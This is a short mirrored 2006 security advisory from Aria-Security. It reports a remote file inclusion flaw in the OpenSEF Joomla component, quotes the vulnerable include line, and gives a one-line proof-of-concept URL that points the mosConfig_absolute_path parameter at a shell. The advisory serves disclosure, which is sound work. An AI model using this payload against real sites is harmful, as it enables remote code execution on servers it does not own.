Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13972
HistoryAug 21, 2006 - 12:00 a.m.

Modification For OpenSEF Remote file Inclusion

2006-08-2100:00:00
vulners.com
53
            ###########################################################################################
            #                       Aria-Security.net Advisory                                        #
            #                       Discovered  by: O.U.T.L.A.W                                       #                     #                       < www.Aria-security.net >                                         #
            #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                              #
            #                                                                                         #
            ###########################################################################################

#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)
#Source:

require_once( $mosConfig_absolute_path . '/includes/sef.php' );
} else {
// Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
//


#Proof of Concept:
#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL

#----------------------------------------------------------

#Contact : [email protected]